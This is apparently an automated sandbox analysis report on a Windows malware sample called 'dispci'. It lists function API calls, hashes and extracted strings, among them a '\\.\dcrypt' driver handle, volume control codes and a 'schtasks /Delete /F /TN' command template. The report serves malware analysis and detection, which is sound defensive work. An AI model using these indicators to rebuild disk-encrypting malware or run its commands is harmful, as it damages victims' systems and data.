                                              • Opcode ID: 5245906d20f47a1457c37ea77def020134132f83af2807c8e52995a655e2c6a6
                                              • Instruction ID: 9bc5a767425db74d26153f8bc74e8e9e7e1a703a2c9721cce7f7212946e5845a
                                              • Opcode Fuzzy Hash: 5245906d20f47a1457c37ea77def020134132f83af2807c8e52995a655e2c6a6
                                              • Instruction Fuzzy Hash: 53214A75A00209AFDF00EFA4DC45BAEB7B5FF49710F50816AE915AB391CB709A06CB94
                                              Function 00A84490 Relevance: 13.6, APIs: 9, Instructions: 80memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844AA
                                              • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844BD
                                              • GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D0
                                              • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D7
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844F3
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84504
                                              • HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A8450B
                                              • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84513
                                              • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84535
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                              • String ID:
                                              • API String ID: 2825476172-0
                                              • Opcode ID: 0042a32c6ada9344e25a0d0e41feb7d5ee3a0fc6371aa662bb11d5bde5944af1
                                              • Instruction ID: 92b0caa1a7b209a776efa933d19eae2b08fc11cedd774c1276fb26a3cf9fdf7a
                                              • Opcode Fuzzy Hash: 0042a32c6ada9344e25a0d0e41feb7d5ee3a0fc6371aa662bb11d5bde5944af1
                                              • Instruction Fuzzy Hash: C1211276601214BBCB20DBA9EC4CA9FBB7CEB49766F104256F90AD2250DA719A01C7A0
                                              Function 00A820A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
                                              Download Yara Rule
                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A820BD
                                              • _wcschr.LIBCMT ref: 00A820C8
                                              • _wcschr.LIBCMT ref: 00A820F8
                                              • __snwprintf.LIBCMT ref: 00A8210C
                                              • DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8213D
                                              • DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00A82196
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDevice_wcschr$Value__snwprintf
                                              • String ID: \??\Volume%s
                                              • API String ID: 2726058786-4071929160
                                              • Opcode ID: 8da969f6f69135a1c698e1927b79e102f382a57a28d6f43e56b4622f3e81bac0
                                              • Instruction ID: 0a792ed02b12c5f6632cceddf8dcc79efac19876ac9a019eeb0fbc3ddc5b7408
                                              • Opcode Fuzzy Hash: 8da969f6f69135a1c698e1927b79e102f382a57a28d6f43e56b4622f3e81bac0
                                              • Instruction Fuzzy Hash: D131C531B00218AFDB24EB74CC4AFBAB3B8EF49710F404555F90997191EEB45E44CBA1
                                              Function 00A83BE0 Relevance: 12.1, APIs: 8, Instructions: 126fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A83BFA
                                              • _malloc.LIBCMT ref: 00A83C40
                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00A83C63
                                              • ReadFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00A83C88
                                              • _memmove.LIBCMT ref: 00A83CA6
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00A83CBB
                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00A83CD7
                                              • _free.LIBCMT ref: 00A83CEF
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ReadWrite__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2931023824-0
                                              • Opcode ID: 77c08e4b1a29db33023865f075ff57961e7b47b6628aab57398c98152f137833
                                              • Instruction ID: 7132c96dff5d564334b5b01a2e6ea9354f394c2bd277547fcf4d43aed5a7b0bf
                                              • Opcode Fuzzy Hash: 77c08e4b1a29db33023865f075ff57961e7b47b6628aab57398c98152f137833
                                              • Instruction Fuzzy Hash: 114182B6A00215ABCF14EF65CC85E9B7B79EB85750F148229FD09AB244D630AE04C7E1
                                              Function 00A82E50 Relevance: 9.1, APIs: 6, Instructions: 137fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A82E65
                                              • _malloc.LIBCMT ref: 00A82EB6
                                              • SetFilePointer.KERNEL32(?,00000000,?,00000000), ref: 00A82EDE
                                              • ReadFile.KERNEL32(?,00000000,-00000200,?,00000000,?,00000000,?,00000000), ref: 00A82F01
                                              • _memmove.LIBCMT ref: 00A82F29
                                              • _free.LIBCMT ref: 00A82F35
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2967271196-0
                                              • Opcode ID: 0d0a78af65c929136ad871185afe13d42db0387c9c349a2861e15d1f3d79d5ee
                                              • Instruction ID: 3bb6c44538829af49bea25758bddd96c5e311bd07d8ef1ac63e3dbbfab8962e7
                                              • Opcode Fuzzy Hash: 0d0a78af65c929136ad871185afe13d42db0387c9c349a2861e15d1f3d79d5ee
                                              • Instruction Fuzzy Hash: 1B419671E00118AFDB14DF99D884ABEB7B9EF84320F15817AED199B791E7349E10C790
                                              Function 00A83AF0 Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A83B0A
                                              • _malloc.LIBCMT ref: 00A83B50
                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A83B73
                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,?,00000000), ref: 00A83B93
                                              • _memmove.LIBCMT ref: 00A83BBC
                                              • _free.LIBCMT ref: 00A83BC5
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2967271196-0
                                              • Opcode ID: 56ef61acfd3c8f3bc4ecd12629473f41f83d6d7a18dad5df5cb99b0964898626
                                              • Instruction ID: a3f1dc365f48f9c158fb9e062739d4d52d92c2afc471c79a65bca96bfcf2758a
                                              • Opcode Fuzzy Hash: 56ef61acfd3c8f3bc4ecd12629473f41f83d6d7a18dad5df5cb99b0964898626
                                              • Instruction Fuzzy Hash: 6A31C7B7A00215ABCF14EF69DC8599A77B9EB94720F14826AFC099B240D670EE01C7E0
                                              Function 00A8970C Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 00A89718
                                                • Part of subcall function 00A8A0B6: __getptd_noexit.LIBCMT ref: 00A8A0B9
                                                • Part of subcall function 00A8A0B6: __amsg_exit.LIBCMT ref: 00A8A0C6
                                              • __amsg_exit.LIBCMT ref: 00A89738
                                              • __lock.LIBCMT ref: 00A89748
                                              • InterlockedDecrement.KERNEL32(?), ref: 00A89765
                                              • _free.LIBCMT ref: 00A89778
                                              • InterlockedIncrement.KERNEL32(020717F0), ref: 00A89790
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 3470314060-0
                                              • Opcode ID: 50ea380a98c8265d308fe57b945bdf420a0f089f4bfa96fbed80b256f2e78b94
                                              • Instruction ID: d801008abbef366dc23799c18eab194f6cde8cfe92e248975015cd03b283cea3
                                              • Opcode Fuzzy Hash: 50ea380a98c8265d308fe57b945bdf420a0f089f4bfa96fbed80b256f2e78b94
                                              • Instruction Fuzzy Hash: B2019232E15A11ABCB11FFA59A4676FB7A0BF01720F194106F810A72A1CF389942CBD2
                                              Function 00A85A50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A85910: GetLocalTime.KERNEL32(?), ref: 00A8592B
                                                • Part of subcall function 00A85910: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A8593F
                                                • Part of subcall function 00A85910: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A85979
                                                • Part of subcall function 00A85910: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A8598B
                                                • Part of subcall function 00A85910: PathAppendW.SHLWAPI(?,?), ref: 00A859F8
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A85ACE
                                              • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A85B2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Time$System$DirectoryFileObjectSingleWait$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                              • String ID: %ws_%u$schtasks /Delete /F /TN %ws$viserion
                                              • API String ID: 1242734776-1187404337
                                              • Opcode ID: 9e92a85ae973f7433d45191673fa7197a57ef98889facbe84670bd267da0f90e
                                              • Instruction ID: 57724689e1d5134683775ee6950169e3c205940b2ea2cb9da9e11db87975335f
                                              • Opcode Fuzzy Hash: 9e92a85ae973f7433d45191673fa7197a57ef98889facbe84670bd267da0f90e
                                              • Instruction Fuzzy Hash: B821B6A0F9070467D610BA30DCC3EAB7295EB80750F404939BE445B2D1E975AD0D83E2
                                              Function 00A83350 Relevance: 7.6, APIs: 5, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • _malloc.LIBCMT ref: 00A833C1
                                              • CloseHandle.KERNEL32 ref: 00A8350F
                                              • _free.LIBCMT ref: 00A83516
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                              • String ID:
                                              • API String ID: 496446412-0
                                              • Opcode ID: fb8f33431c96ca855bfd9df895a676f1cf09f173b257959092ad28fe5115883e
                                              • Instruction ID: c6ec152f3a39a292fc75e3e27716ea9d4784c789627a60f4634fdd3ed72ee92f
                                              • Opcode Fuzzy Hash: fb8f33431c96ca855bfd9df895a676f1cf09f173b257959092ad28fe5115883e
                                              • Instruction Fuzzy Hash: 7941D6F3D0021C9BDF21EB54CC81BEA7378EB84710F1581F9EA0967242D675AF858BA5
                                              Function 00A82650 Relevance: 7.6, APIs: 5, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • DeviceIoControl.KERNEL32(?,000700A0,00000000,00000000,?,00000028,?,00000000), ref: 00A8269B
                                              • __aulldiv.LIBCMT ref: 00A826E5
                                              • __aulldiv.LIBCMT ref: 00A82702
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?,000700A0,00000000), ref: 00A827D2
                                              • _free.LIBCMT ref: 00A827D9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __aulldiv_free$CloseControlCreateDeviceFileHandle__snwprintf_malloc
                                              • String ID:
                                              • API String ID: 1280953716-0
                                              • Opcode ID: 685921b9f98a250adcbe28b15d6a3953ccbee04dd611c6b51b501db1b3806b7f
                                              • Instruction ID: 8037e9904bade6a2e253b30b67b487a8127f043ef06cee78393c480696f20dab
                                              • Opcode Fuzzy Hash: 685921b9f98a250adcbe28b15d6a3953ccbee04dd611c6b51b501db1b3806b7f
                                              • Instruction Fuzzy Hash: 504146B5D011149FDB24EF25CC89BBBB3B9EB84710F1541E9B809A7240D734AE80CF60
                                              Function 00A85370 Relevance: 7.6, APIs: 5, Instructions: 122memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00A8539B
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00000104), ref: 00A853D9
                                                • Part of subcall function 00A82340: VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8235D
                                                • Part of subcall function 00A82340: TlsGetValue.KERNEL32(?), ref: 00A82370
                                                • Part of subcall function 00A82340: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82388
                                                • Part of subcall function 00A82340: TlsSetValue.KERNEL32(?,00000000), ref: 00A8239D
                                                • Part of subcall function 00A82340: DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A823B9
                                                • Part of subcall function 00A82340: GetLastError.KERNEL32 ref: 00A823C3
                                                • Part of subcall function 00A82340: VirtualLock.KERNEL32(?,00000298), ref: 00A823D6
                                                • Part of subcall function 00A83820: TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00A82463,?), ref: 00A8382D
                                                • Part of subcall function 00A83820: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00A82463,?), ref: 00A83845
                                                • Part of subcall function 00A83820: TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00A82463,?), ref: 00A8385A
                                                • Part of subcall function 00A83820: DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00A83876
                                                • Part of subcall function 00A83820: GetLastError.KERNEL32(?,?,?,?,00A82463,?), ref: 00A83880
                                                • Part of subcall function 00A83820: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00A82463,?), ref: 00A83894
                                                • Part of subcall function 00A83820: VirtualUnlock.KERNEL32(?,?,?,?,?,?,00A82463,?), ref: 00A838C2
                                                • Part of subcall function 00A83820: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00A82463,?), ref: 00A838D3
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000104,?,00000080), ref: 00A85417
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000410,00A9A5B0,00000410,00000000,00000000), ref: 00A85474
                                              • LocalFree.KERNEL32(?), ref: 00A854E6
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$Value$CreateFile$AllocByteCharControlDeviceErrorFreeLastLockMultiWide$LocalQueryUnlock
                                              • String ID:
                                              • API String ID: 1566722532-0
                                              • Opcode ID: e03ba43e211df4c71bdf52f45e565f94e1f1630d07a3cb9318a47c2f9dfd194c
                                              • Instruction ID: f8ccf174ca2436098a12105fce3534e6fd80e0885b3e9b965f2e7948e032bd44
                                              • Opcode Fuzzy Hash: e03ba43e211df4c71bdf52f45e565f94e1f1630d07a3cb9318a47c2f9dfd194c
                                              • Instruction Fuzzy Hash: 0441F7B1E002186BDB20BB649D43FEA77B9DF54B00F004094FF45AA181EAB0AEC48F90
                                              Function 00A84C90 Relevance: 7.6, APIs: 5, Instructions: 111synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84D04
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D0B
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A84D2B
                                              • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00A84D82
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D89
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue$ObjectSingleWait
                                              • String ID:
                                              • API String ID: 4079559193-0
                                              • Opcode ID: d17ea315ea596af771afa39f7165afa70982b3e7dd7abb815cd578ce16738b35
                                              • Instruction ID: 33122cc7d80a3a3e545582dbc0a21f10f66efd4cbb7d124bb9aa62e4a5559d49
                                              • Opcode Fuzzy Hash: d17ea315ea596af771afa39f7165afa70982b3e7dd7abb815cd578ce16738b35
                                              • Instruction Fuzzy Hash: 1331C5727043016BE720EBA9DC86FBB73A9EB89710F044919FA45CB2D1EA709D05C7A5
                                              Function 00A84CC9 Relevance: 7.6, APIs: 5, Instructions: 74synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84D04
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D0B
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A84D2B
                                              • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00A84D82
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D89
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue$ObjectSingleWait
                                              • String ID:
                                              • API String ID: 4079559193-0
                                              • Opcode ID: f12458f1caf2675bceb48e4761fd1345d6f9cb87fdf157ecfd438dbf94d1cfcf
                                              • Instruction ID: d9a29fe50ebf3039c2b95bcae66da09baf14614366486647117dfb64c5d22a68
                                              • Opcode Fuzzy Hash: f12458f1caf2675bceb48e4761fd1345d6f9cb87fdf157ecfd438dbf94d1cfcf
                                              • Instruction Fuzzy Hash: 04215B72714301AFE724EBA5DC5ABBA77B8EB89B00F044909F646CA291EA749901C761
                                              Function 00A8DDB8 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _malloc.LIBCMT ref: 00A8DDC6
                                                • Part of subcall function 00A85E86: __FF_MSGBANNER.LIBCMT ref: 00A85E9F
                                                • Part of subcall function 00A85E86: __NMSG_WRITE.LIBCMT ref: 00A85EA6
                                                • Part of subcall function 00A85E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85ECB
                                              • _free.LIBCMT ref: 00A8DDD9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 5e25bb21671f507d3a9fda9f362229b40da1dafecda22ddcca7e49a4cd99ddc7
                                              • Instruction ID: 671aff0bc69f6d169bb3e5893b868d809a7e5bbebf6a644bd1c35170dc4616f4
                                              • Opcode Fuzzy Hash: 5e25bb21671f507d3a9fda9f362229b40da1dafecda22ddcca7e49a4cd99ddc7
                                              • Instruction Fuzzy Hash: 0F11A333905611ABCF327FB4AD0566E3BA5AF553A0F34452AF8589A1A0DF35CD818790
                                              Function 00A89E8D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 00A89E99
                                                • Part of subcall function 00A8A0B6: __getptd_noexit.LIBCMT ref: 00A8A0B9
                                                • Part of subcall function 00A8A0B6: __amsg_exit.LIBCMT ref: 00A8A0C6
                                              • __getptd.LIBCMT ref: 00A89EB0
